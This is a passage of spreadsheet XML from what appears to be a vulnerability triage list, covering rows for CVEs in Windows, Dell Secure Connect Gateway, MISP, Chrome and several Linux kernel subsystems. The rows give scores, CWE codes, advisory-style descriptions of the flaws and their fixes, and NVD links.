          <t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L253" s="5" t="inlineStr"/>
      <c r="M253" s="5" t="inlineStr"/>
      <c r="N253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O253" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P253" s="5" t="inlineStr"/>
      <c r="Q253" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R253" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78444</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78449</t>
        </is>
      </c>
      <c r="D254" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E254" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F254" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G254" s="5" t="inlineStr"/>
      <c r="H254" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I254" s="5" t="inlineStr"/>
      <c r="J254" s="5" t="inlineStr"/>
      <c r="K254" s="5" t="inlineStr"/>
      <c r="L254" s="5" t="inlineStr"/>
      <c r="M254" s="5" t="inlineStr"/>
      <c r="N254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O254" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P254" s="5" t="inlineStr"/>
      <c r="Q254" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R254" s="5" t="inlineStr">
        <is>
          <t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78449</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80132</t>
        </is>
      </c>
      <c r="D255" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E255" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F255" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G255" s="5" t="inlineStr"/>
      <c r="H255" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I255" s="5" t="inlineStr"/>
      <c r="J255" s="5" t="inlineStr"/>
      <c r="K255" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L255" s="5" t="inlineStr"/>
      <c r="M255" s="5" t="inlineStr"/>
      <c r="N255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O255" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P255" s="5" t="inlineStr"/>
      <c r="Q255" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R255" s="5" t="inlineStr">
        <is>
          <t>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S255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80132</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80133</t>
        </is>
      </c>
      <c r="D256" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E256" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I256" s="5" t="inlineStr"/>
      <c r="J256" s="5" t="inlineStr"/>
      <c r="K256" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L256" s="5" t="inlineStr"/>
      <c r="M256" s="5" t="inlineStr"/>
      <c r="N256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O256" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P256" s="5" t="inlineStr"/>
      <c r="Q256" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="R256" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Relative Path Traversal vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to remote execution.</t>
        </is>
      </c>
      <c r="S256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80133</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81003</t>
        </is>
      </c>
      <c r="D257" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E257" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F257" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I257" s="5" t="inlineStr"/>
      <c r="J257" s="5" t="inlineStr"/>
      <c r="K257" s="5" t="inlineStr"/>
      <c r="L257" s="5" t="inlineStr"/>
      <c r="M257" s="5" t="inlineStr"/>
      <c r="N257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O257" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P257" s="5" t="inlineStr"/>
      <c r="Q257" s="5" t="inlineStr"/>
      <c r="R257" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/iucv: filter frames in afiucv_hs_rcv() by ingress device
afiucv_hs_rcv() selects a socket from iucv_sk_list by matching four 8-byte
name fields in the transport header alone. No check is made against the
net_device the frame arrived on.
This can cause a frame arriving on any netdev to be delivered to an AF_IUCV
socket. Three problems follow.
First, a frame arriving over HiperSockets can be delivered to a socket
bound to the classic z/VM IUCV transport, which has iucv-&gt;hs_dev == NULL.
iucv_sock_bind() takes the classic path whenever the requested userid
matches iucv_userid, even on a guest that also has a HiperSockets device
carrying the same identifier. The child socket created by
afiucv_hs_callback_syn() for such a match inherits hs_dev = NULL and
transport = AF_IUCV_TRANS_HIPER, so the first send() on it returns -ENODEV.
The socket delivered to accept() is unusable.
Second, a frame arriving on one netdev can be delivered to a socket bound
to a different IQD device. Which can lead to
- Accept-queue exhaustion (DoS)
- Attacker-controlled peer identity in the child socket
- Data injection into existing sockets
- Fabric noise on the IQD fabric, where bogus replies are sent
- killing established connections
Third, all AF_IUCV sockets live in init_net, as iucv_sock_alloc() calls
sk_alloc(&amp;init_net, ...). But even frames arriving on netdev devices in a
namespace can be delivered to an IUCV socket. So a process in an
unprivileged user and network namespace holding only the CAP_NET_RAW
capability valid within that namespace can send a raw ETH_P_AF_IUCV frame
on its own lo device and have it matched against init_net sockets.
Fix all three by skipping any socket whose hs_dev does not match the
ingress device. A classic z/VM IUCV socket has hs_dev == NULL; the ingress
dev is never NULL, so classic sockets are skipped automatically. An unbound
HIPER socket also has hs_dev == NULL and is skipped. A bound HIPER socket
is only reachable from the exact IQD device it was bound to. Because hs_dev
is always a device in init_net (iucv_sock_bind() scans
for_each_netdev_rcu(&amp;init_net, ...) exclusively), a frame whose ingress
device belongs to another namespace never matches any socket.
Note that AF_IUCV over HiperSockets provides no per-connection
authentication: no sequence numbers, no TLS, no nonce. The four name fields
identifying a connection are exchanged in plaintext on the shared
HiperSockets segment (VCHID). Any host on the same HiperSockets segment
could spoof any frame type against an existing connection. That is a
protocol-level property unchanged by this patch. The fix reduces the attack
surface to peers present on the same HiperSockets segment.</t>
        </is>
      </c>
      <c r="S257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81003</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83997</t>
        </is>
      </c>
      <c r="D258" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E258" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F258" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I258" s="5" t="inlineStr"/>
      <c r="J258" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K258" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L258" s="5" t="inlineStr"/>
      <c r="M258" s="5" t="inlineStr"/>
      <c r="N258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O258" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P258" s="5" t="inlineStr"/>
      <c r="Q258" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R258" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83997</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85237</t>
        </is>
      </c>
      <c r="D259" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E259" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I259" s="5" t="inlineStr"/>
      <c r="J259" s="5" t="inlineStr"/>
      <c r="K259" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="L259" s="5" t="inlineStr"/>
      <c r="M259" s="5" t="inlineStr"/>
      <c r="N259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O259" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P259" s="5" t="inlineStr"/>
      <c r="Q259" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="R259" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in MISP's email-based one-time password (OTP) authentication flow allowed an attacker to perform an unrestricted number of OTP verification attempts.
The email_otp() endpoint did not apply brute-force protection when validating submitted OTP values. An attacker who had reached the OTP verification stage, for example after successfully providing a user's primary authentication credentials, could repeatedly submit candidate OTP values while the same OTP remained valid. This significantly increased the feasibility of guessing the OTP and bypassing the additional authentication factor, potentially resulting in unauthorized access to the affected user's account.
The issue was exacerbated by the fact that the OTP is associated with the user rather than with an individual pending login session, allowing multiple concurrent sessions to attempt guesses against the same valid OTP.
The patch integrates the existing MISP brute-force protection mechanism into the email OTP flow. Failed OTP attempts are now counted against the user, further attempts are rejected once the configured threshold is reached, and the active OTP is invalidated when the attempt budget is exhausted. Blocklisted users are also prevented from requesting the generation of a fresh OTP. In addition, OTP comparison now uses hash_equals() and validates that the submitted value is a string.</t>
        </is>
      </c>
      <c r="S259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85237</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87606</t>
        </is>
      </c>
      <c r="D260" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E260" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F260" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I260" s="5" t="inlineStr"/>
      <c r="J260" s="5" t="inlineStr"/>
      <c r="K260" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L260" s="5" t="inlineStr"/>
      <c r="M260" s="5" t="inlineStr"/>
      <c r="N260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O260" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P260" s="5" t="inlineStr"/>
      <c r="Q260" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R260" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in SiteIsolation in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87606</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89524</t>
        </is>
      </c>
      <c r="D261" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E261" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F261" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I261" s="5" t="inlineStr"/>
      <c r="J261" s="5" t="inlineStr"/>
      <c r="K261" s="5" t="inlineStr"/>
      <c r="L261" s="5" t="inlineStr"/>
      <c r="M261" s="5" t="inlineStr"/>
      <c r="N261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O261" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P261" s="5" t="inlineStr"/>
      <c r="Q261" s="5" t="inlineStr"/>
      <c r="R261" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: ath6kl: clamp assoc request/response lengths before subtracting IE offsets
ath6kl_cfg80211_connect_event() subtracts fixed IE offsets from
assoc_req_len (-= 4) and assoc_resp_len (-= 6), both u8, with no lower
bound. The aggregate check recently added to ath6kl_wmi_connect_event_rx()
bounds the declared lengths from above (their sum must fit the received
event), but an assoc request/response shorter than its fixed offset still
underflows here: the u8 wraps to ~250, and cfg80211_connect_result() /
cfg80211_roamed() then treat that wrapped value as the IE length and copy
that many bytes out of the small assoc_info buffer to user space via
nl80211, disclosing adjacent slab memory.
Clamp both lengths to their offsets before subtracting.
Found by 0sec (https://0sec.ai) using automated source analysis; the
missing lower bound is evident from source. Compile-tested.</t>
        </is>
      </c>
      <c r="S261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89524</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89535</t>
        </is>
      </c>
      <c r="D262" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E262" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F262" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I262" s="5" t="inlineStr"/>
      <c r="J262" s="5" t="inlineStr"/>
      <c r="K262" s="5" t="inlineStr"/>
      <c r="L262" s="5" t="inlineStr"/>
      <c r="M262" s="5" t="inlineStr"/>
      <c r="N262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O262" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P262" s="5" t="inlineStr"/>
      <c r="Q262" s="5" t="inlineStr"/>
      <c r="R262" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
svcrdma: Reorder rpcrdma_rn_unregister before rdma_destroy_id
svc_rdma_free() caches rdma-&gt;sc_cm_id-&gt;device before teardown,
then calls rdma_destroy_id(sc_cm_id) which frees the cm_id.
rpcrdma_rn_unregister() follows, but between those two calls
the transport's sc_rn entry is still installed in the device's
rd_xa. A concurrent ib_unregister_device walk can dispatch
svc_rdma_xprt_done() against the now-freed sc_cm_id.
Move rpcrdma_rn_unregister() before rdma_destroy_id() so the
transport's notification entry is removed from the xarray before
the cm_id it references is destroyed.
Also guard the sc_cm_id dereference with a NULL check: the
following patches introduce paths that reach svc_rdma_free()
with sc_cm_id == NULL (listener create failure, ADDR_CHANGE
replacement failure).</t>
        </is>
      </c>
      <c r="S262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89535</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89547</t>
        </is>
      </c>
      <c r="D263" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E263" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F263" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I263" s="5" t="inlineStr"/>
      <c r="J263" s="5" t="inlineStr"/>
      <c r="K263" s="5" t="inlineStr"/>
      <c r="L263" s="5" t="inlineStr"/>
      <c r="M263" s="5" t="inlineStr"/>
      <c r="N263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O263" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P263" s="5" t="inlineStr"/>
      <c r="Q263" s="5" t="inlineStr"/>
      <c r="R263" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: Check svc pool percpu counter allocation
__svc_create() initializes three per-pool percpu_counter stats and
ignores every return value. On SMP, percpu_counter_init() fails when
__alloc_percpu_gfp() cannot satisfy the allocation, leaving the failed
counter with fbc-&gt;counters == NULL and its embedded raw_spinlock_t,
list_head, and count never initialized. __svc_create() returns the
half-constructed svc_serv to nfsd, lockd, or the NFS callback service
anyway.
Once that service is live, the hot-path increments in
svc_xprt_enqueue(), svc_handle_xprt(), and
svc_pool_wake_idle_thread() reach a counter whose backing pointer is
NULL. The pointer is a per-cpu offset, so the access does not fault:
it resolves to offset zero of the current CPU's per-cpu area and
silently corrupts whatever variable lives there. A
/proc/fs/nfsd/pool_stats read walks the same NULL per-cpu storage and
returns garbage, and on CONFIG_DEBUG_SPINLOCK or lockdep it splats on
the never-initialized lock.
Creating the broken service requires a percpu allocation failure during
RPC server startup, so it is reachable only by a local administrator
under memory pressure or fault injection; a remote peer cannot induce
the bad state on its own.
Check each percpu_counter_init() return value in __svc_create() and
fail when an allocation fails, unwinding the counters already set up
in the current pool and in every pool initialized before it. A
discrete percpu_counter_destroy() per counter at teardown frees each
per-cpu allocation exactly once.</t>
        </is>
      </c>
      <c r="S263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89547</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89583</t>
        </is>
      </c>
      <c r="D264" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E264" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F264" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G264" s="5" t="inlineStr"/>
      <c r="H264" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I264" s="5" t="inlineStr"/>
      <c r="J264" s="5" t="inlineStr"/>
      <c r="K264" s="5" t="inlineStr"/>
      <c r="L264" s="5" t="inlineStr"/>
      <c r="M264" s="5" t="inlineStr"/>
      <c r="N264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O264" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P264" s="5" t="inlineStr"/>
      <c r="Q264" s="5" t="inlineStr"/>
      <c r="R264" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: eir: Fix OOB read in eir_get_service_data()
eir_get_service_data() walks the advertising data for a Service Data
field with a matching UUID.  On a mismatch it advances:
    eir += dlen;
    eir_len -= dlen;
eir_get_data() reports dlen as the field's data length, but the field
spans dlen + 2 bytes once its length and type bytes count, and more
when non-Service-Data fields were skipped to reach it.  The pointer
lands correctly on the next field.  eir_len does not, and the shortfall
compounds across fields until eir_get_data() reads the length and type
bytes of a "field" past the end of the buffer.
For an ISO broadcast sink that buffer is hcon-&gt;le_per_adv_data[], filled
from the periodic advertising reports of a remote broadcaster.  A PA
payload packed with mismatching Service Data fields walks off the array
into the rest of struct hci_conn.  A drifted field that matches the BAA
UUID puts those bytes in iso_pi(sk)-&gt;base, where user space reads them
back with getsockopt(BT_ISO_BASE).
Recompute eir_len from the end of the buffer each iteration.</t>
        </is>
      </c>
      <c r="S264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89583</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89667</t>
        </is>
      </c>
      <c r="D265" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E265" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F265" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I265" s="5" t="inlineStr"/>
      <c r="J265" s="5" t="inlineStr"/>
      <c r="K265" s="5" t="inlineStr"/>
      <c r="L265" s="5" t="inlineStr"/>
      <c r="M265" s="5" t="inlineStr"/>
      <c r="N265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O265" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P265" s="5" t="inlineStr"/>
      <c r="Q265" s="5" t="inlineStr"/>
      <c r="R265" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: close shrinker/GC/fsnotify vs per-net shutdown race in filecache
The shrinker, GC worker, and fsnotify/lease callbacks can unhash an
nfsd_file from the rhashtable and then call
nfsd_file_dispose_list_delayed() to move it to the per-net dispose list.
If nfsd_file_cache_shutdown_net() runs concurrently, its rhashtable walk
misses the already-unhashed file, and its drain of the per-net dispose
list can run before the file has been queued.  The file then sits on
the per-net list with no thread to drain it, leaking both the file and
its associated state.
The GC worker and shrinker already hold nfsd_gc_lock while walking the
LRU, but in the original code they release it before calling
nfsd_file_dispose_list_delayed().  The fsnotify/lease path
(nfsd_file_close_inode) has no synchronization at all.
Fix this by:
  1. Widening nfsd_gc_lock in both nfsd_file_gc() and nfsd_file_lru_scan()
     to cover the nfsd_file_dispose_list_delayed() call.
  2. Wrapping nfsd_file_close_inode() in nfsd_gc_lock so that all three
     callers of nfsd_file_dispose_list_delayed() hold the lock.
  3. Adding a spin_lock/unlock(nfsd_gc_lock) barrier in
     nfsd_file_cache_shutdown_net() after the purge, so that any
     in-progress disposal has fully completed before the per-net list
     is drained.
All operations inside the lock are non-sleeping (rhashtable lookups,
atomic bit/refcount ops, list moves, svc_wake_up), so the spinlock is
appropriate.</t>
        </is>
      </c>
      <c r="S265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89667</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89682</t>
        </is>
      </c>
      <c r="D266" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E266" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F266" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I266" s="5" t="inlineStr"/>
      <c r="J266" s="5" t="inlineStr"/>
      <c r="K266" s="5" t="inlineStr"/>
      <c r="L266" s="5" t="inlineStr"/>
      <c r="M266" s="5" t="inlineStr"/>
      <c r="N266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O266" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P266" s="5" t="inlineStr"/>
      <c r="Q266" s="5" t="inlineStr"/>
      <c r="R266" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix fcache_disposal UAF by inlining dispose state into nfsd_net
nfsd_file_dispose_list_delayed() defers fput() to nfsd service threads
via a per-net freeme queue, preventing the shrinker and GC worker from
bearing the cost of closing files (see ffb402596147).  However, the
queue lives in a separately-allocated struct nfsd_fcache_disposal that
is freed by nfsd_free_fcache_disposal_net() during per-net teardown.
The global shrinker, laundrette, and fsnotify callbacks can still be
inside nfsd_file_dispose_list_delayed() dereferencing that pointer,
causing a use-after-free.
Inline the spinlock and freeme list directly into struct nfsd_net (as
fcache_dispose_lock and fcache_dispose_list), eliminating the separately
allocated struct nfsd_fcache_disposal entirely.  These fields now have
the same lifetime as the net namespace itself, so there is no dangling
pointer to chase.
nfsd_file_cache_start_net() now just initializes the inline fields and
cannot fail due to allocation.  nfsd_file_cache_shutdown_net() drains
the inline list directly instead of freeing a separate struct.  The
alloc/free helpers are removed.</t>
